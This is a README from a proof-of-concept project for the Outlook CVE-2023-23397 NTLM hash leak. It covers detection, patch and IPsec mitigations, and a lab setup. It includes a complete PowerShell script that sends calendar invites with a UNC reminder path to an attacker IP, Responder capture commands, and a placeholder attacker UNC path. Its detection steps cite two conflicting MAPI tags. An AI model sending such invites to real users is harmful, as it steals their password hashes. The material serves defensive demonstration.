来源

关联漏洞

描述

Demonstration of CVE-2023-23397 Outlook Privellege Escalation vulnerability

介绍

# CVE-2023-23397 Exploitation & Mitigation Demo

## 📌 Overview

This project demonstrates the detection, exploitation, and mitigation of **CVE-2023-23397**, a critical zero-click NTLM relay vulnerability in Microsoft Outlook for Windows. Exploited via calendar invites, this vulnerability allows attackers to capture NTLMv2 hashes **without any user interaction**.

> 🛡️ **CVSS Score:** 9.8 (Critical)  
> 🖥️ **Affected Versions:** Outlook 2013, 2016, 2019, Microsoft 365 (before March 14, 2023 patch)

---

## ⚠️ Vulnerability Details

Outlook’s calendar reminders can be configured to play custom sounds via the `PidLidReminderFileParameter` MAPI property. Outlook fails to validate UNC paths, allowing remote SMB requests when reminders are triggered.

```plaintext
\\attacker-ip\share\sound.wav
```

This causes NTLMv2 hashes to be sent to attacker-controlled servers, which can then:
- Be cracked offline (password recovery)
- Be used in NTLM relay attacks for privilege escalation

---

## 🔍 Detection Method

Use **MFCMAPI** to inspect calendar items and check for malicious values in `PidLidReminderFileParameter` (MAPI tag `0x851F001F`).

### Steps:
1. Open MFCMAPI → `QuickStart > Open Folder > Calendar`
2. Go to `Table > Set Columns`
3. Add property tag `0x808A001F` to view reminder file paths
4. Look for UNC paths as an indicator of compromise

---

## 🛠️ Mitigation Techniques

### 1. Apply Microsoft Patch (Recommended)

Install the March 14, 2023 patch (e.g., KB5002044). The patch introduces:

- `IsFileZoneLocalIntranetOrTrusted()` to validate reminder file paths
- Group Policy options to define trusted domains

**Test Result:**  
Outlook will log **Event ID 1008** and block access to untrusted SMB paths.

---

### 2. IPsec Network-Level Mitigation (Temporary)

#### a. Block All SMB

- Blocks outbound TCP 445 (SMB)
- Prevents NTLM leaks to untrusted networks

#### b. Allow Trusted IPs Only

- Define internal IPs (e.g., `192.168.1.0/24`)
- Maintain business continuity for internal SMB usage

📂 Pre-built policy: [OutlookMitigation.ipsec](./Outlook%20mitgation.ipsec)

---

## 💻 Project Setup

### Environment

| System        | Username             | Password   |
|---------------|----------------------|------------|
| Kali Linux    | kali                 | kali       |
| Windows 10 VM | CVE-2023-23397       | vbox@123   |
| Email Account | victim​@exploit.com   | vbox@123   |

---

### Attacker (Kali Linux)

```bash
sudo apt install responder
sudo responder -I eth0 -v
```

Make sure Kali and the victim VM are on the same network.

---

### Victim (Windows + Outlook 2013)

1. Install:
    - Outlook 2013
    - .NET 2.0
    - hMailServer
    - MFCMAPI

2. Setup:
    - hMailServer domain: `exploit.com`
    - Email user: `victim@exploit.com`

---

### 🚨 Exploitation ([PowerShell Script](./Outlook.ps1))

```powershell
# Initialize Outlook COM object
$Outlook = New-Object -ComObject Outlook.Application
$Namespace = $Outlook.GetNamespace("MAPI")
 
$ip = "192.168.1.7" # Attacker IP here
$emails = @("victim1@exploit.com")  # List of emails

# Create a new appointment item
$Appointment = $Outlook.CreateItem(1) # 1 corresponds to olAppointmentItem

# Set appointment properties
$Appointment.Subject = "CVE Presentation Demo Demo"
$Appointment.Body = "This is a test meeting, please ignore it."
$Appointment.Location = "Dubai"
$Appointment.Start = (Get-Date).AddSeconds(1) # Start time set to 1 second from now
$Appointment.Duration = 30 # Duration in minutes

# Configure reminder settings
$Appointment.ReminderSet = $true
$Appointment.ReminderMinutesBeforeStart = 0
$Appointment.ReminderOverrideDefault = $true
$Appointment.ReminderPlaySound = $true
$Appointment.ReminderSoundFile = "\\$ip\nonexistent\sound.wav"

foreach ($email in $emails) {
    $Appointment.Recipients.Add($email) | Out-Null
}

# Save and send the appointment
$Appointment.Save()
$Appointment.Send()

```

Responder will capture the NTLMv2 hash from the victim system.

---

## ✅ Verification

### Detection
- Use MFCMAPI to confirm `PidLidReminderFileParameter` contains a UNC path.

### Mitigation
- Apply patch or IPsec policy.
- Re-run script: Outlook may show a reminder but **no NTLM hash should be captured**.


---

## ❗ Limitations

- Blocking all SMB traffic can affect legitimate services (file sharing, domain auth)
- Maintaining trusted IPs can become operationally complex

---

文件快照

 [4.0K]  /data/pocs/73582a7e0b5ec96248353d1a0ff8349c4b274f6b
├── [1.0K]  LICENSE
├── [ 20K]  Outlook mitgation.ipsec
├── [1.0K]  Outlook.ps1
└── [4.3K]  README.md

0 directories, 4 files

备注